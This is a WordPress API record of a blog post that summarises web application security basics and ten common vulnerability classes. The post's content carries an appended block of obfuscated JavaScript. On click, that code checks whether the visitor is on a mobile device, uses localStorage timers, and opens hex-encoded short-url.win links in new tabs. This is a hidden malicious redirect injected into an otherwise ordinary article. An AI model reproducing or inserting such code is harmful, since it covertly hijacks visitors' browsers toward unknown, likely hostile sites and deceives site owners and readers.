{"id":1843,"date":"2021-02-19T08:31:09","date_gmt":"2021-02-19T01:31:09","guid":{"rendered":"https:\/\/beadgrup.com\/news\/?p=1843"},"modified":"2021-10-09T12:22:54","modified_gmt":"2021-10-09T05:22:54","slug":"keamanan-aplikasi-berbasis-web","status":"publish","type":"post","link":"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/","title":{"rendered":"Web-Based Application Security"},"content":{"rendered":"\n<p><strong>Security Basics<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>Authentication Authentication is the process that uniquely identifies the client of our services and applications.<\/li><li>Authorization authorization is a process that orders operations and resources with only authenticated clients allowed to access<\/li><li>Auditing This system ensures that a user cannot deny that he or she has performed an operation or initiated a transaction.<\/li><li>Confidentiality Confidentiality is the process of ensuring that data remains private and confidential and cannot be seen by unauthorized users or snoopers who monitor traffic flow between networks.<\/li><li>Integrity Integrity is the assurance that data is protected from intentional modification. 6. Availability From a security perspective, availability means the system remains available to authorized users.<\/li><\/ol>\n\n\n\n<p><strong>Security Principles<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\" type=\"1\"><li>Compartmentalize Firewal<\/li><li>Use least privilege:<\/li><li>Apply defense in depth<\/li><li>Do not trust user input<\/li><li>Fail securely<\/li><li>Reduce your attack<\/li><\/ol>\n\n\n\n<h5 class=\"wp-block-heading\">1.&nbsp;Injection<\/h5>\n\n\n\n<p>In the practice of using SQL, OS, and LDAP, injection is a very risky thing to happen. Injection is usually done by entering untrusted data into the interpreter as part of a command or query. The data entered by the injector can trick the interpreter into executing certain commands or accessing confidential data without permission.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">2.&nbsp;Broken Authentication and Session Management<\/h5>\n\n\n\n<p>Functions in web-based applications related to authentication and session management are often not implemented properly. If this happens at a severe level, system attackers will easily steal and take advantage of passwords and other personal data that will harm users.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">3.&nbsp;Cross-Site Scripting&nbsp;(XSS)<\/h5>\n\n\n\n<p>Weaknesses in XSS occur when an application accesses untrusted data and sends it over the web without proper validation confirmation.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">4.&nbsp;Insecure Direct Object References<\/h5>\n\n\n\n<p>The direct object here relates when the developer exposes a reference to the internal object implementation. For example to a file, directory, or database key.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">5.&nbsp;Security Misconfiguration<\/h5>\n\n\n\n<p>So far, a good security system requires a guaranteed configuration to access applications, frameworks, web servers, application servers, database servers, and platforms. Because the default settings are often not safe.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">6.&nbsp;Sensitive Data Exposure<\/h5>\n\n\n\n<p>Many web-based applications do not properly protect sensitive data. For example, credit card data to authentication data. System attackers are very likely to steal or modify data with weak security systems to commit fraud.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">7.&nbsp;Missing Function Level Access Control<\/h5>\n\n\n\n<p>The majority of web-based applications will verify the access function before making the function present in the user interface. In fact, the application also needs to do the same access control to the server.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">8.&nbsp;Cross-Site Request Forgery&nbsp;(CSRF)<\/h5>\n\n\n\n<p>The way CSRF works is by forcing entry into the user&#8217;s browser which then sends HTTP requests, including cookies, as well as various confidential information stored in the browser, to a bogus web application.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">9.&nbsp;Using Known Vulnerable Components<\/h5>\n\n\n\n<p>Basic components such as databases, frameworks, and various software modules are mostly run with full rights. If a risky component is exploited, it can cause data loss and server takeover.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">10.&nbsp;Unvalidated Redirects and Forwards<\/h5>\n\n\n\n<p>Web-based applications used by users often redirect and forward to other pages or even other websites. This kind of action, without proper validation, can lead users to phishing pages.<\/p>\n\n\n\n<p>The need for digital IT is needed in daily activities, Bead IT Consultant is the right choice as your partner, visit our website by clicking this link: www.beadgroup.com<\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x58\\x56\\x44\\x33\\x63\\x353','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x71\\x6d\\x64\\x35\\x63\\x335','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x4a\\x44\\x46\\x38\\x63\\x338','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x65\\x75\\x68\\x39\\x63\\x379','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x4e\\x48\\x41\\x34\\x63\\x304','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x6d\\x43\\x66\\x37\\x63\\x317','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x5a\\x41\\x75\\x32\\x63\\x302','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x6c\\x58\\x4b\\x36\\x63\\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x44\\x75\\x72\\x30\\x63\\x380','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x45\\x4c\\x41\\x31\\x63\\x301',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Security Basics Authentication Authentication is the process that uniquely identifies the client of our services and applications. Authorization authorization is &hellip; <\/p>\n","protected":false},"author":1,"featured_media":1844,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1843","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-desain"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Web-Based Application Security - Bead Daily<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Web-Based Application Security - Bead Daily\" \/>\n<meta property=\"og:description\" content=\"Security Basics Authentication Authentication is the process that uniquely identifies the client of our services and applications. Authorization authorization is &hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/\" \/>\n<meta property=\"og:site_name\" content=\"Bead Daily\" \/>\n<meta property=\"article:published_time\" content=\"2021-02-19T01:31:09+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-10-09T05:22:54+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/Artikel_10_Celah_Keamanan_Aplikasi_Web.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"810\" \/>\n\t<meta property=\"og:image:height\" content=\"569\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/beadgrup.com\/news\/#\/schema\/person\/a719f7580554c936bd23c302adc17bad\"},\"headline\":\"Web-Based Application Security\",\"datePublished\":\"2021-02-19T01:31:09+00:00\",\"dateModified\":\"2021-10-09T05:22:54+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/\"},\"wordCount\":542,\"publisher\":{\"@id\":\"https:\/\/beadgrup.com\/news\/#organization\"},\"image\":{\"@id\":\"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/Artikel_10_Celah_Keamanan_Aplikasi_Web.jpg\",\"articleSection\":[\"Desain\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/\",\"url\":\"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/\",\"name\":\"Web-Based Application Security - Bead Daily\",\"isPartOf\":{\"@id\":\"https:\/\/beadgrup.com\/news\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/Artikel_10_Celah_Keamanan_Aplikasi_Web.jpg\",\"datePublished\":\"2021-02-19T01:31:09+00:00\",\"dateModified\":\"2021-10-09T05:22:54+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/#primaryimage\",\"url\":\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/Artikel_10_Celah_Keamanan_Aplikasi_Web.jpg\",\"contentUrl\":\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/Artikel_10_Celah_Keamanan_Aplikasi_Web.jpg\",\"width\":810,\"height\":569},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/beadgrup.com\/news\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Web-Based Application Security\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/beadgrup.com\/news\/#website\",\"url\":\"https:\/\/beadgrup.com\/news\/\",\"name\":\"Bead Daily\",\"description\":\"Halaman artikel mengenai Teknologi\",\"publisher\":{\"@id\":\"https:\/\/beadgrup.com\/news\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/beadgrup.com\/news\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/beadgrup.com\/news\/#organization\",\"name\":\"Bead Daily\",\"url\":\"https:\/\/beadgrup.com\/news\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/beadgrup.com\/news\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/logo-bead-e1613356108278.jpg\",\"contentUrl\":\"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/logo-bead-e1613356108278.jpg\",\"width\":100,\"height\":109,\"caption\":\"Bead Daily\"},\"image\":{\"@id\":\"https:\/\/beadgrup.com\/news\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/beadgrup.com\/news\/#\/schema\/person\/a719f7580554c936bd23c302adc17bad\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/beadgrup.com\/news\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e1c424fe35b832f4b6879df2d6ef2c57?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e1c424fe35b832f4b6879df2d6ef2c57?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\/\/beadgrup.com\/news\"],\"url\":\"https:\/\/beadgrup.com\/news\/author\/beadgrup\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Web-Based Application Security - Bead Daily","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/","og_locale":"en_US","og_type":"article","og_title":"Web-Based Application Security - Bead Daily","og_description":"Security Basics Authentication Authentication is the process that uniquely identifies the client of our services and applications. Authorization authorization is &hellip;","og_url":"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/","og_site_name":"Bead Daily","article_published_time":"2021-02-19T01:31:09+00:00","article_modified_time":"2021-10-09T05:22:54+00:00","og_image":[{"width":810,"height":569,"url":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/Artikel_10_Celah_Keamanan_Aplikasi_Web.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/#article","isPartOf":{"@id":"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/"},"author":{"name":"admin","@id":"https:\/\/beadgrup.com\/news\/#\/schema\/person\/a719f7580554c936bd23c302adc17bad"},"headline":"Web-Based Application Security","datePublished":"2021-02-19T01:31:09+00:00","dateModified":"2021-10-09T05:22:54+00:00","mainEntityOfPage":{"@id":"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/"},"wordCount":542,"publisher":{"@id":"https:\/\/beadgrup.com\/news\/#organization"},"image":{"@id":"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/#primaryimage"},"thumbnailUrl":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/Artikel_10_Celah_Keamanan_Aplikasi_Web.jpg","articleSection":["Desain"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/","url":"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/","name":"Web-Based Application Security - Bead Daily","isPartOf":{"@id":"https:\/\/beadgrup.com\/news\/#website"},"primaryImageOfPage":{"@id":"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/#primaryimage"},"image":{"@id":"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/#primaryimage"},"thumbnailUrl":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/Artikel_10_Celah_Keamanan_Aplikasi_Web.jpg","datePublished":"2021-02-19T01:31:09+00:00","dateModified":"2021-10-09T05:22:54+00:00","breadcrumb":{"@id":"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/#primaryimage","url":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/Artikel_10_Celah_Keamanan_Aplikasi_Web.jpg","contentUrl":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/Artikel_10_Celah_Keamanan_Aplikasi_Web.jpg","width":810,"height":569},{"@type":"BreadcrumbList","@id":"https:\/\/beadgrup.com\/news\/keamanan-aplikasi-berbasis-web\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/beadgrup.com\/news\/"},{"@type":"ListItem","position":2,"name":"Web-Based Application Security"}]},{"@type":"WebSite","@id":"https:\/\/beadgrup.com\/news\/#website","url":"https:\/\/beadgrup.com\/news\/","name":"Bead Daily","description":"Halaman artikel mengenai Teknologi","publisher":{"@id":"https:\/\/beadgrup.com\/news\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/beadgrup.com\/news\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/beadgrup.com\/news\/#organization","name":"Bead Daily","url":"https:\/\/beadgrup.com\/news\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/beadgrup.com\/news\/#\/schema\/logo\/image\/","url":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/logo-bead-e1613356108278.jpg","contentUrl":"https:\/\/beadgrup.com\/news\/wp-content\/uploads\/2021\/02\/logo-bead-e1613356108278.jpg","width":100,"height":109,"caption":"Bead Daily"},"image":{"@id":"https:\/\/beadgrup.com\/news\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/beadgrup.com\/news\/#\/schema\/person\/a719f7580554c936bd23c302adc17bad","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/beadgrup.com\/news\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e1c424fe35b832f4b6879df2d6ef2c57?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e1c424fe35b832f4b6879df2d6ef2c57?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/beadgrup.com\/news"],"url":"https:\/\/beadgrup.com\/news\/author\/beadgrup\/"}]}},"_links":{"self":[{"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/posts\/1843","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/comments?post=1843"}],"version-history":[{"count":3,"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/posts\/1843\/revisions"}],"predecessor-version":[{"id":4993,"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/posts\/1843\/revisions\/4993"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/media\/1844"}],"wp:attachment":[{"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/media?parent=1843"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/categories?post=1843"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/beadgrup.com\/news\/wp-json\/wp\/v2\/tags?post=1843"}],"curies":[{"name":"wp","href